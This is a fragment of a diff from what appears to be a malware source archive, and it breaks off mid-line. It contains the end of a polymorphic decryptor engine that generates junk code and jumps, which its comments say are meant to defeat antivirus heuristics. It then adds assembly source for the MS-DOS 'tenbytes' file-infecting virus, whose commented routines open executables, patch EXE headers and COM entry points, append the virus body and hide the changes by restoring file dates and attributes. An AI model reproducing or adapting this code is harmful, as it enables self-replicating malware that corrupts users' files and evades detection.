ENGINE 0.4 *** +;***************************************************** +;***************************************************** + +tce: push ax,bx,bp + push di,si + + cld + + mov tce_begin,di + mov tce_delta,dx + mov c_length,cx + mov tce_flags,ax + call clear_regs + mov B index_sub,0 + + mov B[offset more_junk],0b0 + test W tce_flags,MAKE_SMALL + if nz mov B[offset more_junk],0c3 + + push si + call get_rand_1f + add ax,MAX_PADDING + xchg cx,ax + call more_junk + +swap0: mov si,offset init_1 + lodsw + call binary + jz no_swap1 + xchg ax,[si] + mov [si-2],ax + +no_swap1: + push ax + lodsw + call binary + jnz no_swap2 + xchg ax,[si] + mov [si-2],ax + +no_swap2: + push ax + lodsw + lodsw + call binary + jz build_code + xchg ax,[si] + mov [si-2],ax + +build_code: + pop ax + call ax + call pad_10 + pop ax + call ax + call pad_10 + call W init_3 + call pad_10 + call gen_decrypt + call pad_8 + call W init_4 + call pad_8 + call W init_5 + call pad_10 + call gen_loop + call pad_8 + + test W tce_flags,PAD_TO_MAX + jz no_padding + + mov B[offset more_junk],0b0 + mov cx,DECRYPTOR_LENGTH + add cx,tce_begin + sub cx,di + call more_junk + +no_padding: + mov ax,di + sub ax,DECRYPTOR_LENGTH + add enc_index,ax + mov bx,W index_loc + cmp B index_sub,1 + if e neg ax + add es:[bx],ax + + pop si + mov cx,c_length + rep movsb + mov dx,tce_begin + mov ds,es + call encryptor + mov cx,di + sub cx,dx + + pop si,di + pop bp,bx,ax + ret + +init_count: ;Initialises Count Register.. + call get_unused_reg ;Make Count Initialiser in Encryptor and + cmp al,tce_DX + je init_count + mov count_reg,al ;Decryptor + mov bx,W c_length + shr bx,1 + mov W enc_length,bx + call gen_mov_reg + ret + +init_index: ;Initialises Index Register.. + mov ax,0ff ;Makes Index Initialiser in Encryptor and + call get_rand ;Decryptor.. + push ax + call get_rand_7 + pop ax + if z xor ax,ax + mov B index_off,al + mov bx,DECRYPTOR_LENGTH + add bx, tce_begin + mov W enc_index,bx + add bx, tce_delta + cbw + sub bx,ax + +get_index: + call get_unused_reg + cmp al,tce_BX + jb get_index + mov W index_num,ax + mov B index_reg,al + mov B index_set,1 + call gen_mov_reg + mov B index_set,0 + ret + +gen_decrypt: ;generates DECRYPTOR / ENCRYPTOR instruction + mov W loop_start,di + call pad_8 + mov bl,B key_reg + sal bl,3 + call get_rand_2 + add ax,ax + add ax,offset enc_table + xchg si,ax + lodsw + call binary + if z xchg ah,al + push ax + cmp si,offset enc_table + 2 + jne no_carry_set + mov al,0f8 + call binary + if z inc ax + mov B enc_cf,al + stosb + +no_carry_set: + test W tce_flags,ADD_SEG + jz no_seg_set + mov al,2e + stosb + +no_seg_set: + pop ax + stosb + mov B enc_loop,ah + mov si,W index_num + + cmp B index_reg,tce_BP + je encryptor_has_offset + cmp B index_off,0 + jne encryptor_has_offset + push ax + call get_rand_7 + pop ax + jz encryptor_has_offset + add si,index_tab_c + lodsb + or al,bl + stosb + ret + +encryptor_has_offset: + add si,index_tab_b + lodsb + or al,bl + mov ah,B index_off + or al,bl + stosw + xchg al,ah + cbw + call binary + jnz ret + mov al,ah + stosb + add es:B[di-3],40 + ret + +modify_key: ;Modify Key: XOR/ADD/SUB key_reg,xxxx + call get_rand_7 + jz no_mod_key + call get_rand_2 + add ax,offset modify_table + xchg si,ax + lodsb + mov ah,al + mov al,81 + mov W enc_mod_op,ax + or ah,B key_reg + stosw + call get_any_rand + stosw + +no_mod_key: + mov W enc_mod_val,ax + + ret + +inc_index: ;increase index by 2.. + call binary ;1 in 2 chance of ADD reg,2/SUB reg,-2 + jz add_sub_index + + mov al,B index_reg + or al,40 + stosb + call pad_8 + stosb + ret + +add_sub_index: + mov al,83 + stosb + mov ah,2 + mov al,B index_reg + or al,0c0 + + call binary + jnz put_add_sub_index + + neg ah + or al,0e8 + +put_add_sub_index: + stosw + ret + +gen_loop: + mov al,B count_reg + cmp al,tce_CX + jne not_CX + + push ax + call get_rand_7 + pop ax + jz not_CX + + lea bx,[di+2] + mov ax,W loop_start + sub ax,bx + mov ah,0e2 + call binary + jnz no_loop_nz + xchg bp,ax + jmp short do_loop_nz + +no_loop_nz: + xchg ah,al + stosw + ret + +not_CX: xchg bx,ax + + call binary + jz count_add_sub + + mov al,48 + or al,bl + stosb + jmp short zero_test + + +count_add_sub: + mov al,83 + stosb + mov ah,-1 + mov al,bl + or al,0c0 + + call binary + jnz put_add_sub_count + + neg ah + or al,0e8 + +put_add_sub_count: + stosw + xor bp,bp + push ax + call get_rand_7 + pop ax + jz nloop_nz + +zero_test: + call pad_10 + xor bp,bp +do_loop_nz: + mov al,B count_reg + mov bl,al + sal al,3 + or al,bl + xchg ah,al + mov bh,ah + call get_rand_2 + add ax,offset zero_test_a + xchg si,ax + lodsb + mov ah,bh + or ah,0c0 + stosw + +nloop_nz: + lea bx,[di+2] + mov ax,W loop_start + sub ax,bx + or bp,bp + jnz loop_nz + mov ah,075 + call binary + jnz nnnn + mov B es:[di],0f8 + inc di + sub ax,0fe01 + db 0a9 + +loop_nz:mov ah,0e0 + + +nnnn: xchg ah,al + stosw + ret + +init_key: + call get_any_rand + mov W enc_key,ax + xchg bx,ax + call get_unused_reg + mov B key_reg,al + +gen_mov_reg: + call binary + jz lea_mov + + or al,0b8 + stosb + xchg ax,bx + jmp short put_mov_b + +lea_mov:call binary + jz zero_then_add + + sal al,3 + or al,06 + mov ah,8d + xchg ah,al + stosw + xchg ax,bx + jmp short put_mov_b + +zero_then_add: ;Zero Register (XOR/SUB reg,reg) + push bx ;Then OR/XOR/ADD Value + push ax ;or SUB -Value + mov ah,0c0 + or ah,al + sal al,3 + or ah,al + mov al,29 + call binary + if z mov al,31 + stosw + call pad_10 + pop bx + call get_rand_2 + add ax,offset value_from_0 + xchg si,ax + lodsb + call binary + jz zero_then_sub + + or al,bl + mov ah,81 + xchg ah,al + stosw + pop ax + +put_mov_b: + cmp B index_set,01 + if e mov W index_loc,di + stosw + ret + +zero_then_sub: + cmp B index_set,01 + if e mov B index_sub,1 + mov al,0e8 + or al,bl + mov ah,81 + xchg ah,al + stosw + pop ax + neg ax + jmp short put_mov_b + +pad_8: push ax ;Sub Procedure to Pad Between 1 and 8 bytes + call get_rand_7 + inc ax + jmp short padder + +pad_10: push ax + call get_rand_1f ;Sub Procedure to Pad Between 8 and 16 bytes + or al,8 +padder: xchg cx,ax + call more_junk + pop ax + ret + + +more_junk: + mov al,03 + call get_rand_b + jnz mj0 + + mov B [offset code_jmp],083 ;Re-Enable Jumps + mov ax,cx ;else normal filler junk (1 in 16) + cmp ax,40 + if a mov al,40 + call get_rand_b + xchg bx,ax + call fill_jnk + jmp short mj2 + +mj0: ;8 in 16 chance of some type of jump + call code_jmp + + +mj2: jcxz ret + jmp short more_junk + + +one_byte: ;GENERATES A ONE BYTE JUNK INSTRUCTION + jcxz ret + mov si,one_byters ;FROM one_byters TABLE + mov al,length_1 + call get_rand_b + add si,ax + movsb + dec cx + dec bx + ret + +reg_op: call get_rand_7 ;ANY OP unused_reg16,reg16.. + sal al,3 + or al,3 + xchg dx,ax + call get_unused_reg + sal al,3 + mov dh,al + call get_rand_7 +do_op: or dh,al + or dh,0c0 + xchg dx,ax +put_2: cmp bx,2 + jb one_byte + stosw + dec cx,2 + dec bx,2 + ret + + +lea_reg:call get_rand_7 ;LEA unused_reg,[BP/BX/SI/DI] + cmp al,6 + je lea_reg + + xchg dx,ax + call get_unused_reg + sal al,3 + or al,dl + mov ah,08d + xchg ah,al + + jmp short put_2 + +op_ax: call get_any_rand + and al,8 + or al,5 + and ah,3 + shr ah,4 + or al,ah + +put_3: cmp bx,3 + jb reg_op + stosb + call get_any_rand +put_3b: stosw + sub cx,3 + sub bx,3 + ret + +mov_reg:call get_unused_reg ;MOV unused_reg16,xxxx + or al,0b8 + jmp short put_3 + + +op_reg_im: ;cmp/add/sub/adc/sbb/or/xor/and reg16,imm16 + cmp bx,4 + jb op_ax + call get_unused_reg + mov ah,81 + xchg dx,ax + call get_rand_7 + sal al,3 + or ax,dx + xchg ah,al + or ah,0c0 + stosw + call get_any_rand + stosw + sub bx,4 + sub cx,4 + ret + + +code_jmp: + cmp cx,3 + jb ret + + mov B [offset code_jmp],0c3 ;Disable Jumps.This ensures Unchained + ;(TBAV-J) and helps stops heuristics + call get_any_rand ;else conditional jmp + and ax,1f0f ;between 4 and 43 bytse jmp length + add ah,4 + or al,70 ;conditional jmp instructions are 70 + ;--> 7f + push ax + call get_rand_1f + pop ax + if z mov al,0e3 + xor bx,bx + mov bl,ah + + dec cx,2 + cmp bx,cx + jb put_jmp + mov bx,cx + mov ah,bl + +put_jmp:stosw + +fill_jnk: + or bx,bx + jz ret + + mov al,((offset binary - offset junk_tbl)/2)-1 + call get_rand_b + add ax,ax + add ax,offset junk_tbl + xchg si,ax + lodsw + call ax + jmp short fill_jnk + + +pp_reg: ;generate PUSH reg / junk / POP reg + cmp bx,3 + jb gen_int + + lea ax,[bx-2] + shr ax,1 + call get_rand + xchg ax,dx + call get_rand_7 + or al,50 + stosb + dec cx + dec bx + push ax + xchg dx,ax + sub bx,ax + push bx + xchg bx,ax + call fill_jnk + pop bx + pop ax + + call binary + jz use_same + call get_unused_reg + or al,50 + +use_same: + or al,8 + stosb + dec cx + dec bx + ret + + +gen_int:cmp bx,4 + jb ret + + call get_rand_2 + + add ax,ax + add ax,offset int_tbl + xchg si,ax + lodsw + mov dx,0cdb4 + xchg al,dl + stosw + xchg dx,ax + xchg ah,al + stosw + sub cx,4 + sub bx,4 + ret + +junk_tbl: dw offset op_reg_im + dw offset op_reg_im + dw offset op_reg_im + dw offset gen_int + dw offset gen_int + dw offset pp_reg + dw offset pp_reg + dw offset reg_op + dw offset reg_op + dw offset lea_reg + dw offset lea_reg + dw offset mov_reg + dw offset op_ax + dw offset one_byte + +binary: push ax + mov al,1 + call get_rand_b + pop ax + ret + +get_rand_2: + mov al,2 + db 0a9 + +get_rand_7: + mov al,7 + db 0a9 + +get_rand_1f: + mov al,1f + db 0a9 + +get_any_rand: ;return rnd number in AX between 0 and FFFE + mov al,0fe + +get_rand_b: + cbw + +get_rand: ;returns random number in AX between 0 and AX + push cx,dx + inc ax + push ax + in ax,40 + xchg cx,ax + in ax,40 + rol ax,cl + xchg cx,ax + in ax,40 + xor ax,cx + adc ax,1234 + org $-2 +last_rand dw 0AAAA + mov last_rand,ax + pop cx + xor dx,dx + cmp cx,1 + adc cx,0 + div cx + xchg dx,ax + or ax,ax + pop dx,cx + ret + +one_byters: cmc ;15 1 byte junk instructions + cld + std + in ax,dx + in al,dx + lahf + cbw + nop + aaa + aas + daa + das + inc ax + dec ax + xlat + + +int_tbl: dw 0116 ;AH=01,INT16: Check Keyboard Buffer.. + dw 0216 ;AH=02,INT16: Get Keyboard States.. + dw 4d21 ;AH=4D,INT21: Get Program Terminate Status.. + dw 4d21 ;AH=4D,INT21: Get Program Terminate Status.. + dw 0d10 ;AH=0D,INT10: Get Video Info.. + dw 0b21 ;AH=0B,INT21: Check Keyboard Buffer.. + dw 002a + dw 002a + + +clear_regs: cwd + mov B index_reg,dl ;Clears Register Tables + mov B key_reg,dl ;(All Regs Free).. + mov B count_reg,dl + ret + +get_unused_reg: call get_rand_7 ;Return an Unused Register.. + test al,NOT tce_SP ;But _NOT_ SP, or AX. + jz get_unused_reg + cmp al,index_reg + je get_unused_reg + cmp al,count_reg + je get_unused_reg + cmp al,B key_reg + je get_unused_reg + ret + + +;********************************************** +;* The Encryptor (Built along with Decryptor) * +;********************************************** +encryptor: mov cx,1234 + org $-2 +enc_length dw 0 + + mov bx,1234 + org $-2 +enc_index dw 0 + + mov ax,1234 + org $-2 +enc_key dw 0 + +enc_cf: nop +enc_loop: xor [bx],ax + +enc_mod_op dw 0 +enc_mod_val dw 0 + + inc bx,2 + loop enc_cf + ret + +;**************************** +;* Data / Variables / Flags * +;**************************** + +init_1 dw offset init_count +init_2 dw offset init_key +init_3 dw offset init_index + +init_4 dw offset inc_index +init_5 dw offset modify_key + +;* The Below is A table of Values to Be Used To Choose * +;* The Count Register, The Index Register, and The Reg * +;* to save SP in During the Decryptor Loop * +; BX BP SI DI ;This Table is used To Build +index_tab_b: db 0,0,0,47,0,46,44,45 ;The Decryptor Instruction +index_tab_c: db 0,0,0,7,0,0,4,5 ;Same As Above +; SBB ADC XOR XOR ADD SUB +enc_table: db 19, 11, 31, 31, 01, 29 ;The Decryptor Opcodes.. + +; AND OR TEST +zero_test_a: db 21, 09,85 + +; SUB ;Opcodes to Modify the Key +modify_table: db 0e8 ;Register +; ADD XOR OR ;Opcode to get A value +value_from_0: db 0c0,0f0,0c8 ;from 0. + +loop_start dw 0 ;Postion for LOOP to Jump to.. + +index_num dw 0 +index_off db 0 ;OFFSET of INDEX reference (i.e: [SI+XX]). +index_loc dw 0 ;location in ES of index reference set +index_sub db 0 ;Was index_reg set using 0 the sub -value? + +index_reg db 0 ;Table of Used Registers.. +count_reg db 0 ;used in GET_UNUSED_REG +key_reg db 0 +index_set db 0 + +tce_flags dw 0 ;Engines Flags +tce_delta dw 0 ;Delta Offset +tce_begin dw 0 ;Beginning +c_length dw 0 +end_tce: + diff --git a/MSDOS/Virus.MSDOS.Unknown.tenbytes.asm b/MSDOS/Virus.MSDOS.Unknown.tenbytes.asm new file mode 100644 index 00000000..4f16859d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tenbytes.asm @@ -0,0 +1,826 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 100h + +start: mov ax,es ;0100 8C C0 + add word ptr cs:[d_010C+2],ax ;segment relocation ;0102 2E: 01 06 010E + jmp dword ptr cs:[d_010C] ;jump into virus code ;0107 2E: FF 2E 010C + +d_010C dw 0000,0138h ;dword=entry into virus ;010C 0000 0138 + + ;<- duplicated code (aligning to 20h bytes) + db 0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h ;0110 B8 08 00 8E C0 8B 0E 41 + db 003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh ;0118 03 BA 28 00 2E 8B 1E 9B + +;.............................................................. +; victim code +;.............................................................. + org 1380h + + +;============================================================================ +; Segment aligned virus segment begin +;---------------------------------------------------------------------------- + +;================================================================ +; COM virus Entry +; (this code is present only in case *.COM infection) +;---------------------------------------------------------------- +l_0000: push ds ;1380 1E + push cs ;1381 0E + pop ds ;1382 1F + lea si,cs:[4F7h] ;d_1877 = saved bytes ;1383 8D 36 04F7 + mov di,100h ;1387.BF 0100 + mov cx,20h ;138A B9 0020 + rep movsb ;restore victim bytes ;138D F3/ A4 + + mov byte ptr cs:[349h],0FFh ;d_16C9 (0FFh = COM) ;138F 2E: C6 06 0349 FF + nop ;1395 90 + pop ds ;1396 1F + lea ax,cs:[54Fh] ;l_18CF ;1397 8D 06 054F + jmp ax ;139B FF E0 + + ;<--- duplicated fields d_033F - d_0347 + dw 0020 ;139D 20 00 + dw 05EAh ;139F EA 05 + dw 0Bh ;13A1 0B 00 + dw 28h ;13A3 28 00 + dw 200h ;13A5 00 02 + db 0 ;13A7 00 + +;=========================================================================== +; Begin of file type independent virus code +;--------------------------------------------------------------------------- + +;================================================================ +; Get/Set victim attribute +;---------------------------------------------------------------- +s_13A8 proc near + mov dx,offset ds:[57Fh] ;file name ;13A8.BA 057F + mov ah,43h ;get/set file attrb ;13AB B4 43 + int 21h ;13AD CD 21 + retn ;13AF C3 +s_13A8 endp + +;================================================================ +; Move file ptr to EOF +;---------------------------------------------------------------- +s_13B0 proc near + xor cx,cx ;13B0 33 C9 + xor dx,dx ;13B2 33 D2 + mov ax,4202h ;move file ptr EOF+offset ;13B4 B8 4202 + mov bx,cs:[9Bh] ;l_141B = file handle ;13B7 2E: 8B 1E 009B + int 21h ;13BC CD 21 + retn ;13BE C3 +s_13B0 endp + + +;================================================================ +; Read 32 bytes into buffer +;---------------------------------------------------------------- +s_13BF proc near + mov cx,20h ;13BF B9 0020 + mov dx,4F7h ;l_1877-sav victim bytes;13C2.BA 04F7 + mov bx,cs:[9Bh] ;l_141B = file handle ;13C5 2E: 8B 1E 009B + mov ah,3Fh ;read file ;13CA B4 3F + int 21h ;13CC CD 21 + mov cx,ax ;bytes read ;13CE 8B C8 + retn ;13D0 C3 +s_13BF endp + +;================================================================ +; Write 32 B into file +;---------------------------------------------------------------- +s_13D1 proc near + mov ax,8 ;switch off destruction ;13D1 B8 0008 + mov es,ax ;13D4 8E C0 + mov cx,20h ;13D6 B9 0020 + mov dx,offset ds:[4F7h] ;l_1877 - saved bytes ;13D9.BA 04F7 + mov bx,cs:[9Bh] ;l_141B = file handle ;13DC 2E: 8B 1E 009B + mov ah,40h ;write file cx=bytes ;13E1 B4 40 + int 21h ;13E3 CD 21 + mov cx,ax ;13E5 8B C8 + retn ;13E7 C3 +s_13D1 endp + +;================================================================ +; Calculate virus length +;---------------------------------------------------------------- +s_13E8 proc near + mov ax,612h ;virus code length ;13E8 B8 0612 + mov dx,28h ;file type depended code;13EB BA 0028 + sub ax,dx ;13EE 2B C2 + mov ds:[341h],ax ;l_16C1 const vcode len ;13F0 A3 0341 + retn ;13F3 C3 +s_13E8 endp + +;================================================================ +; Get/Set file daye & time +;---------------------------------------------------------------- +s_13F4 proc near + mov bx,ds:[9Bh] ;l_141B = file handle ;13F4 8B 1E 009B + mov ah,57h ;get/set file date & time ;13F8 B4 57 + int 21h ;13FA CD 21 + retn ;13FC C3 +s_13F4 endp + +;================================================================ +; Contamine File - master routine +;---------------------------------------------------------------- +s_13FD proc near + mov byte ptr ds:[349h],0 ;d_16C9 (000h = EXE) ;13FD C6 06 0349 00 + nop ;1402 90 + mov al,0 ;1403 B0 00 + call s_13A8 ;Get victim attribute ;1405 E8 FFA0 + jc l_146A ;-> EXIT ;1408 72 60 + mov ds:[33Fh],cx ;l_16BF oryg. file attr ;140A 89 0E 033F + mov cx,20h ;140E B9 0020 + mov al,1 ;1411 B0 01 + call s_13A8 ;Set victim attribute ;1413 E8 FF92 + jc l_146A ;-> EXIT ;1416 72 52 + jmp short l_1421 ;1418 EB 07 + nop ;141A 90 + +d_009B dw 0005h ;file handle ;141B 05 00 +d_009D dw 0400h ;141D 00 04 +d_009F dw 057Fh ;filepath address ;141F 7F 05 + +l_1421: mov word ptr cs:[9Fh],057Fh ;l_141F := offset l_18FF;1421 2E C7 06 9F 00 7F 05 + mov dx,ds:[9Fh] ;l_141F - file name ;1428 8B 16 009F + mov ax,400h ;142C B8 0400 + mov ds:[9Dh],ax ;l_141D ;142F A3 009D + mov al,2 ;1432 B0 02 + mov ah,3Dh ;open file, al=mode ;1434 B4 3D + int 21h ;1436 CD 21 + mov word ptr ds:[9Bh],0FFFFh ;l_141B = file handle ;1438 C7 06 009B FFFF + jc l_1443 ;143E 72 03 + mov ds:[9Bh],ax ;l_141B = file handle ;1440 A3 009B +l_1443: mov ax,ds:[9Bh] ;l_141B = file handle ;1443 A1 009B + cmp ax,0FFFFh ;1446 3D FFFF + je l_146A ;-> EXIT, open file err ;1449 74 1F + mov al,0 ;144B B0 00 + call s_13F4 ;Get file daye & time ;144D E8 FFA4 + jc l_148F ;-> err, close & exit ;1450 72 3D + mov ds:[0E8h],dx ;l_1468 = date ;1452 89 16 00E8 + mov ds:[0EDh],cx ;l_146D = time ;1456 89 0E 00ED + call s_13BF ;Read 32 B into buffer ;145A E8 FF62 + mov ax,word ptr ds:[4F7h] ;l_1877 first file word ;145D A1 04F7 + cmp ax,5A4Dh ;'MZ' ? ;1460 3D 5A4D + je l_146F ;-> yes, EXE ;1463 74 0A + jmp l_1616 ;-> no, COM ;1465 E9 01AE + +d_00E8 dw 0EF8h ;victim date ;1468 F8 0E + +l_146A: jmp l_15C6 ;146A E9 0159 + +d_00ED dw 0001h ;victim time ;146D 01 00 + +;================================================================ +; EXE file contamination +;---------------------------------------------------------------- +l_146F: mov ax,word ptr ds:[509h] ;+12h = negative sum ;146F A1 0509 + neg ax ;1472 F7 D8 + cmp ax,word ptr ds:[4F9h] ;+2 = last page bytes ;1474 3B 06 04F9 + je l_148F ;-> allready infected ;1478 74 15 + mov ax,word ptr ds:[4FBh] ;+4 = pages in file ;147A A1 04FB + cmp ax,3 ;147D 3D 0003 + jb l_148F ;-> file to small ;1480 72 0D + mov ax,word ptr ds:[4FFh] ;+8 = size of hdr (para);1482 A1 04FF + mov cl,4 ;1485 B1 04 + shl ax,cl ;1487 D3 E0 + mov ds:[347h],ax ;l_16C7 = size of header;1489 A3 0347 + jmp short l_1492 ;148C EB 04 + nop ;148E 90 + +l_148F: jmp l_15A8 ;148F E9 0116 + +l_1492: mov ax,word ptr ds:[50Bh] ;+14h = IP ;1492 A1 050B + mov word ptr ds:[5B4h],ax ;l_1934 ;1495 A3 05B4 + mov word ptr ds:[50Bh],28h ;new IP value (l_13A8) ;1498 C7 06 050B 0028 + call s_13B0 ;Move file ptr to EOF ;149E E8 FF0F + push ax ;14A1 50 + push dx ;14A2 52 + sub ax,ds:[347h] ;l_16C7=size of header ;14A3 2B 06 0347 + sbb dx,0 ;14A7 83 DA 00 + mov word ptr ds:[439h],ax ;l_17B9 ;14AA A3 0439 + mov word ptr ds:[437h],dx ;l_17B7 ;14AD 89 16 0437 + cmp dx,0 ;14B1 83 FA 00 + ja l_14D3 ;-> more then 64KB ;14B4 77 1D + cmp ax,word ptr ds:[50Bh] ;+14h = IP ;14B6 3B 06 050B + ja l_14D3 ;-> more then 28h length;14BA 77 17 + + ;<- EXE code length =< 28h + mov word ptr ds:[345h],0 ;l_16C5 ;14BC C7 06 0345 0000 + mov bx,word ptr ds:[50Bh] ;14C2 8B 1E 050B + sub bx,ax ;28h - file length ;14C6 2B D8 + mov ds:[343h],bx ;l_16C3 - aligning bytes;14C8 89 1E 0343 + mov ds:[513h],bx ;+1Ch = ? ;14CC 89 1E 0513 + jmp short l_1511 ;14D0 EB 3F + nop ;14D2 90 + +l_14D3: sub ax,word ptr ds:[50Bh] ;+14h = IP=28h ;14D3 2B 06 050B + sbb dx,0 ;14D7 83 DA 00 + mov ds:[345h],ax ;d_16C5 ;14DA A3 0345 + and ax,0Fh ;14DD 25 000F + cmp ax,0 ;14E0 3D 0000 + jne l_14F9 ;-> need aligment ;14E3 75 14 + + mov word ptr ds:[343h],0 ;d_16C3 - aligning bytes;14E5 C7 06 0343 0000 + mov ax,ds:[345h] ;d_16C5 ;14EB A1 0345 + mov cx,10h ;14EE B9 0010 + div cx ;14F1 F7 F1 + mov ds:[345h],ax ;d_16C5 - segment of vir;14F3 A3 0345 + jmp short l_1511 ;14F6 EB 19 + db 90h ;14F8 90 + + ;<---- need alignment +l_14F9: mov word ptr ds:[343h],10h ;d_16C3 - aligning bytes;14F9 C7 06 0343 0010 + sub ds:[343h],ax ;d_16C3 - aligning bytes;14FF 29 06 0343 + mov ax,ds:[345h] ;d_16C5 ;1503 A1 0345 + mov cx,10h ;1506 B9 0010 + div cx ;1509 F7 F1 + add ax,1 ;+ alignment paragraph ;150B 05 0001 + mov ds:[345h],ax ;d_16C5 - segment of vir;150E A3 0345 + +l_1511: mov ax,word ptr ds:[50Dh] ;+ 16h = CS ;1511 A1 050D + mov word ptr ds:[5B6h],ax ;d_1936 - victim CS ;1514 A3 05B6 + mov ax,ds:[345h] ;d_16C5 ;1517 A1 0345 + mov word ptr ds:[50Dh],ax ;+ 16h = CS ;151A A3 050D + push ax ;151D 50 + mov ax,word ptr ds:[505h] ;+ 0Eh = SS ;151E A1 0505 + mov word ptr ds:[5A1h],ax ;d_1921 - victim SS ;1521 A3 05A1 + pop ax ;1524 58 + mov word ptr ds:[505h],ax ;+ 0Eh = virus SS ;1525 A3 0505 + mov ax,word ptr ds:[507h] ;+ 10h = SP ;1528 A1 0507 + mov word ptr ds:[5A3h],ax ;d_1923 victim SP ;152B A3 05A3 + lea ax,cs:[612h] ;End of virus ;152E 8D 06 0612 + add ax,1Eh ;virus stack ;1532 05 001E + add ax,ds:[343h] ;d_16C3 - aligning bytes;1535 03 06 0343 + mov word ptr ds:[507h],ax ;virus SP ;1539 A3 0507 + call s_13E8 ;Calculate virus length ;153C E8 FEA9 + pop dx ;<- victim EOF ;153F 5A + pop ax ;1540 58 + add ax,ds:[341h] ;l_16C1 const vcode len ;1541 03 06 0341 + adc dx,0 ;1545 83 D2 00 + add ax,ds:[343h] ;d_16C3 - aligning bytes;1548 03 06 0343 + adc dx,0 ;154C 83 D2 00 + mov cx,200h ;page length ;154F B9 0200 + div cx ;1552 F7 F1 + cmp dx,0 ;1554 83 FA 00 + je l_155A ;1557 74 01 + inc ax ;1559 40 +l_155A: mov word ptr ds:[4FBh],ax ;+4 - file len in pages ;155A A3 04FB + mov word ptr ds:[4F9h],dx ;+2 - last page length ;155D 89 16 04F9 + neg dx ;1561 F7 DA + mov word ptr ds:[509h],dx ;+12h = negative sum ;1563 89 16 0509 + mov cx,54Fh ;offset l_18CF-EXE entry;1567 B9 054F + mov word ptr ds:[50Bh],cx ;+14h - virus IP ;156A 89 0E 050B + cmp word ptr ds:[343h],3 ;d_16C3 - aligning bytes;156E 83 3E 0343 03 + jb l_1580 ;1573 72 0B + + ;<- file begins with jump + mov cx,28h ;1575 B9 0028 + sub cx,ds:[343h] ;d_16C3 - aligning bytes;1578 2B 0E 0343 + mov word ptr ds:[50Bh],cx ;157C 89 0E 050B + +l_1580: call s_15DF ;Set file pointer to BOF;1580 E8 005C + call s_13D1 ;Write 32 B into file ;1583 E8 FE4B + jc l_15A8 ;-> error, EXIT ;1586 72 20 + mov cx,ds:[343h] ;d_16C3 - aligning bytes;1588 8B 0E 0343 + sub cx,3 ;jmp instruction length ;158C 83 E9 03 + mov ax,54Fh ;offset l_18CF=EXE entry;158F B8 054F + mov bx,28h ;beginning of code ;1592 BB 0028 + sub ax,bx ;jmp distance ;1595 2B C3 + add cx,ax ;aligning bytes ;1597 03 C8 + mov word ptr ds:[54Ch],cx ;l_18CC = jump distance ;1599 89 0E 054C + call s_13B0 ;Move file ptr to EOF ;159D E8 FE10 + call s_15C7 ;Align EOF to paragraphs;15A0 E8 0024 + jc l_15A8 ;-> error, EXIT ;15A3 72 03 + call s_15FE ;Write const part of vir;15A5 E8 0056 + +;================================================================ +; End of contamination (common to EXE & COM) +;---------------------------------------------------------------- +l_15A8: mov al,1 ;to set ;15A8 B0 01 + mov dx,ds:ds:[0E8h] ;d_1468 victim date ;15AA 8B 16 00E8 + mov cx,ds:ds:[0EDh] ;d_146D victim time ;15AE 8B 0E 00ED + call s_13F4 ;Set file daye & time ;15B2 E8 FE3F + + mov bx,ds:[9Bh] ;l_141B = file handle ;15B5 8B 1E 009B + mov ah,3Eh ;close file ;15B9 B4 3E + int 21h ;15BB CD 21 + + mov al,1 ;to set ;15BD B0 01 + mov cx,ds:[33Fh] ;l_16BF oryg. file attr ;15BF 8B 0E 033F + call s_13A8 ;Set victim attribute ;15C3 E8 FDE2 + +l_15C6: retn ;15C6 C3 + +;================================================================ +; Align end of file to paragraphs +;---------------------------------------------------------------- +s_15C7: mov ax,8 ;to switch off virus ;15C7 B8 0008 + mov es,ax ;15CA 8E C0 + mov cx,ds:[343h] ;l_16C3 - aligning bytes;15CC 8B 0E 0343 + mov dx,54Bh ;offset d_18CB ;15D0.BA 054B + mov bx,cs:[9Bh] ;l_141B = file handle ;15D3 2E: 8B 1E 009B + mov ah,40h ;write file ;15D8 B4 40 + int 21h ;15DA CD 21 + mov cx,ax ;15DC 8B C8 + retn ;15DE C3 + +;================================================================ +; Set file pointer to BOF +;---------------------------------------------------------------- +s_15DF: xor cx,cx ;15DF 33 C9 + xor dx,dx ;15E1 33 D2 + mov ax,4200h ;move file ptr, cx,dx=offset ;15E3 B8 4200 + mov bx,cs:[9Bh] ;l_141B = file handle ;15E6 2E: 8B 1E 009B + int 21h ;15EB CD 21 + retn ;15ED C3 + +;================================================================ +; COM virus start code pattern +;---------------------------------------------------------------- +d_026E: mov ax,es ;15EE 8C C0 + add word ptr cs:[010Ch+2],ax ;15F0 2E: 01 06 010E + jmp dword ptr cs:[010Ch] ;15F5 2E: FF 2E 010C +d_027A dw 0 ;15FA 00 00 +d_027C dw 0138h ;15FC 38 01 + +;================================================================ +; Write constant part of virus +;---------------------------------------------------------------- +s_15FE: mov ax,8 ;switch off virus ;15FE B8 0008 + mov es,ax ;1601 8E C0 + mov cx,ds:[341h] ;l_16C1 const.code leng.;1603 8B 0E 0341 + mov dx,28h ;offset l_13A8 - vircode;1607.BA 0028 + mov bx,cs:[9Bh] ;l_141B = file handle ;160A 2E: 8B 1E 009B + mov ah,40h ;write file ;160F B4 40 + int 21h ;1611 CD 21 + mov cx,ax ;1613 8B C8 + retn ;1615 C3 + +;================================================================ +; COM victim contamination +;---------------------------------------------------------------- +l_1616: cmp word ptr ds:[4F9h],12Eh ;BOF+2 ;1616 81 3E 04F9 012E + je l_15A8 ;-> contamined, EXIT ;161C 74 8A + call s_13B0 ;Move file ptr to EOF ;161E E8 FD8F + cmp ax,3E8h ;1000 byte file length ;1621 3D 03E8 + jb l_169F ;-> bellow, EXIT ;1624 72 79 + add ax,100h ;add PSP ;1626 05 0100 + adc dx,0 ;1629 83 D2 00 + push ax ;162C 50 + and ax,0Fh ;162D 25 000F + mov word ptr ds:[343h],0 ;l_16C3 aligning bytes ;1630 C7 06 0343 0000 + cmp ax,0 ;1636 3D 0000 + je l_1645 ;-> para aligned file ;1639 74 0A + mov word ptr ds:[343h],10h ;l_16C3 - aligning bytes;163B C7 06 0343 0010 + sub ds:[343h],ax ;l_16C3 - aligning bytes;1641 29 06 0343 +l_1645: pop ax ;1645 58 + add ax,ds:[343h] ;l_16C3 aligning bytes ;1646 03 06 0343 + adc dx,0 ;164A 83 D2 00 + cmp dx,0 ;164D 83 FA 00 + ja l_169F ;-> file to 